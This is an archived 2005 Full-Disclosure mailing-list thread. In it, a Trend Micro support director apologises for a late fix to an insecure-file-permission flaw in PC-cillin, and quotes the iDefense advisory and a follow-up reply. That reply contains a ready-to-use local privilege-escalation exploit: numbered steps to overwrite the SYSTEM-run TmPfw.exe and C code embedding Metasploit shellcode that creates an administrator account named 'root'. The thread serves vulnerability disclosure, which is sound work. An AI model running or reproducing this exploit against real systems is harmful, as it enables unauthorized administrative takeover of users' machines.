lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8BAB9DE63BEA124D8C7E831D7FE6B0FAFEE47F@deexmail02.de.trendnet.org>
Date: Fri Dec 30 02:41:00 2005
From: Martin_Roesler at trendmicro-europe.com (Martin_Roesler@...ndmicro-europe.com)
Subject: iDefense Security Advisory 12.14.05: TrendMicro
	PC-Cillin Internet Security Insecure File PermissionVulnerability


Hello everybody,

due to some internal communication problems, I was not able to reply
here earlier :-(
I really apologize for that !

Our Solution Bank record
http://kb.trendmicro.com/solutions/search/main/search/solutionDetail.asp
?solutionId=27438&id=27438
is pointing you to the related fix and its explanation.
Due to a Trend Micro internal problem, the solution was only made
available to users of a DELL preloaded version of our product (Solution
Bank ID 27428)

Thank you for raising this to my attention. I hope that this solution
now is addressing your valid (!) concern. We were really concerned about
this issue and reacted immediately, but our external communication about
the available solution somehow failed.

I really apologize for this.


Martin Roesler
Director of Global Technical Support Operations
Trend Micro Deutschland GmbH
Lise-Meitner-Str. 4
85716 Unterschleissheim
Tel: +49 89 37479 769
Fax: +49 89 37479 799
E-Mail: Martin_Roesler@...ndmicro-europe.com
__________________________________________________
http://www.trendmicro-europe.com

__________________________________________________
Bei den Informationen, die in dieser E-Mail-Nachricht und den
dazugehoerenden Anhaengen enthalten sind, handelt es sich um
vertrauliche Informationen, die ausschliesslich fuer die oben namentlich
erwaehnte Einzelperson oder Firma oder deren ernannten Vertreter
bestimmt sind. Sollte der Leser dieser Nachricht nicht der beabsichtigte
Empfaenger sein, weisen wir Sie hiermit darauf hin, dass jede
Weitergabe, Verbreitung oder Vervielfaeltigung dieser Nachricht strikt
untersagt ist. Sollten Sie diese Nachricht irrtuemlicherweise erhalten
haben, bitten wir Sie, uns darueber bitte per Rueckantwort oder
telefonisch zu informieren und die besagte Nachricht sofort zu loeschen.
Vielen Dank.


-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Gerhard
Wagner
Sent: Dienstag, 27. Dezember 2005 12:05
To: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] iDefense Security Advisory 12.14.05:
TrendMicro PC-Cillin Internet Security Insecure File
PermissionVulnerability

labs-no-reply@...fense.com wrote:

>
> Trend Micro PC-Cillin Internet Security Insecure File Permission
> Vulnerability
>
> iDefense Security Advisory 12.14.05
> www.idefense.com/application/poi/display?id=351&type=vulnerabilities
> December 14, 2005
>
> I. BACKGROUND
>
> Trend Micro PC-Cillin Internet Security is antivirus protection
> software for home and business use. It provides complete protection,
> detection and elimination of thousands of computer viruses, worms, and

> Trojan Horse programs.
>
> II. DESCRIPTION
>
> Local exploitation of an insecure permission vulnerability in multiple

> Trend Micro Inc. products allows attackers to escalate privileges or
> disable protection.
>
> The vulnerabilities specifically exist in the default Access Control
> List (ACL) settings that are applied during installation. When an
> administrator installs an affected Trend Micro product, the default
> ACL allows any user to modify the installed files. Due to the fact
> that some of the programs run as system services, a user could replace

> an installed Trend Micro product file with their own malicious code,
> and the code would be executed with system privileges.
>
> III. ANALYSIS
>
> Successful exploitation allows local attackers to escalate privileges
> to the system level. It is also possible to use this vulnerability to
> simply disable protection by moving all of the executable files so
> that they cannot start upon a reboot. Once disabled, the products are
> no longer able to provide threat mitigation, thus opening the machine
> up to attack.
>
> IV. DETECTION
>
> iDefense has confirmed the existence of this vulnerability in Trend
> Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is

> suspected that previous versions are also vulnerable. It has been
> reported that InterScan VirusWall, InterScan eManager and Office Scan
> are also vulnerable.
>
> V. WORKAROUND
>
> Apply proper Access Control List settings to the directory that the
> affected Trend Micro product is installed in. The ACL rules be set so
> that no regular users can modify files in the directory.
>
> VI. VENDOR RESPONSE
>
> "Trend Micro has become aware of a vulnerability related to PC-CILLIN
> 12. PC-cillin12 does not work correctly when configuration file and
> the registry are erased intentionally.
>
> We will release PC-cillin12.4 in December 14, 2005 by AU server. This
> release will be included short term solution of changing ACL to User
> authority for configuration file and registry.
>
> And
>
> We will create a tool for changing ACL to User authority for
> configuration file and registry.
>
> This tool can be used for both PC-cillin12 and PC-cillin14 as a same
> program."
>
> VII. CVE INFORMATION
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned
> the name CVE-2005-3360 to this issue. This is a candidate for
> inclusion in the CVE list (http://cve.mitre.org), which standardizes
> names for security problems.
>
> VIII. DISCLOSURE TIMELINE
>
> 10/27/2005 Initial vendor notification
> 10/27/2005 Initial vendor response
> 12/14/2005 Public disclosure
>
> IX. CREDIT
>
> The discoverer of this vulnerability wishes to remain anonymous.
>
> Get paid for vulnerability research
> http://www.iDefense.com/poi/teams/vcp.jsp
>
> X. LEGAL NOTICES
>
> Copyright (c) 2005 iDefense, Inc.
>
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without the express
> written consent of iDefense. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically,
> please email customerservice@...fense.com for permission.
>
> Disclaimer: The information in the advisory is believed to be accurate

> at the time of publishing based on currently available information.
> Use of the information constitutes acceptance for use in an AS IS
condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct,
> indirect, or consequential loss or damage arising from use of, or
> reliance on, this information.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


/*
* by Team W00dp3ck3r:
* frauk\x41iser, mag00n and s00n
*
* Advisory:
www.idefense.com/application/poi/display?id=351&type=vulnerabilities
* Tested on Windows XP Service Pack 2 english
* Version affected PC-cillin Internet Security 2006
*
* Status: currently no patch has been provided (19.12.2005)
*
* Follow the instructions to gain administrative privileges:
*
*
* 1.) Default Installation (can only be accomplished as Administrator).
* 2.) Login is as restricted user.
* 3.) Compile the c code provided at the bottom of this document.
* 4.) Right click on the Trend Micro icon in the taskbar and shut down
Trend Micro
*     (Seems that Trend has forgotten that normal users should not be
able to
*     shutdown an antivirus service).
* 5.) Fire up your favorite editor and open the previous compiled exe
(we recommend
*     UltraEdit) and also open TmPfw.exe which is located in the default
installation
*     directory of your Trend Micro installation.
* 6.) First copy the content of the TmPfw.exe into a blank document and
save it.
*     We will need it later, when we want to repair the service.
* 7.) Now replace the content of the TmPfw.exe file with the content of
the self
*     compiled executable.
*
* Note: It is really important to alter the content of the TmPfw.exe
file. If you
*       just change the filename of the created executable and then
replace the
*       file, the initial rights which are set during the installation
would be lost.
*       The TmPfw.exe file is executed with SYSTEM rights during startup
process of
*       Windows and it's under our control, because Trend Micro really
messed up with
*       the permissions.
*
* 8.) Restart the pccmain.exe and if you type net user in your command
shell you will
*     notice a user with administrative rights called root.
* 9.) Finally open the editor again and restore the content of the
TmPfw.exe. Now
*     Trend Micro works again without complaining.
*
*/

#include "windows.h"

/* win32_adduser -  PASS=root EXITFUNC=thread USER=root Size=232
* Encoder=PexFnstenvSub http://metasploit.com */ unsigned char
shellcode[] =
"\x29\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x72"
"\x66\xf2\xa7\x83\xeb\xfc\xe2\xf4\x8e\x8e\xb6\xa7\x72\x66\x79\xe2"
"\x4e\xed\x8e\xa2\x0a\x67\x1d\x2c\x3d\x7e\x79\xf8\x52\x67\x19\xee"
"\xf9\x52\x79\xa6\x9c\x57\x32\x3e\xde\xe2\x32\xd3\x75\xa7\x38\xaa"
"\x73\xa4\x19\x53\x49\x32\xd6\xa3\x07\x83\x79\xf8\x56\x67\x19\xc1"
"\xf9\x6a\xb9\x2c\x2d\x7a\xf3\x4c\xf9\x7a\x79\xa6\x99\xef\xae\x83"
"\x76\xa5\xc3\x67\x16\xed\xb2\x97\xf7\xa6\x8a\xab\xf9\x26\xfe\x2c"
"\x02\x7a\x5f\x2c\x1a\x6e\x19\xae\xf9\xe6\x42\xa7\x72\x66\x79\xcf"
"\x4e\x39\xc3\x51\x12\x30\x7b\x5f\xf1\xa6\x89\xf7\x1a\x89\x3c\x47"
"\x12\x0e\x6a\x59\xf8\x68\xa5\x58\x95\x05\x9f\xc3\x5c\x03\x8a\xc2"
"\x52\x49\x91\x87\x1c\x03\x86\x87\x07\x15\x97\xd5\x52\x14\x9d\xc8"
"\x06\x46\x80\xc8\x1d\x12\xd2\x88\x33\x22\xb6\x87\x54\x40\xd2\xc9"
"\x17\x12\xd2\xcb\x1d\x05\x93\xcb\x15\x14\x9d\xd2\x02\x46\xb3\xc3"
"\x1f\x0f\x9c\xce\x01\x12\x80\xc6\x06\x09\x80\xd4\x52\x14\x9d\xc8"
"\x06\x46\xdd\xe6\x36\x22\xf2\xa7";

void (*opcode)();

void main(){
	opcode= &shellcode;
	opcode();
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

TREND MICRO EMAIL NOTICE
The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ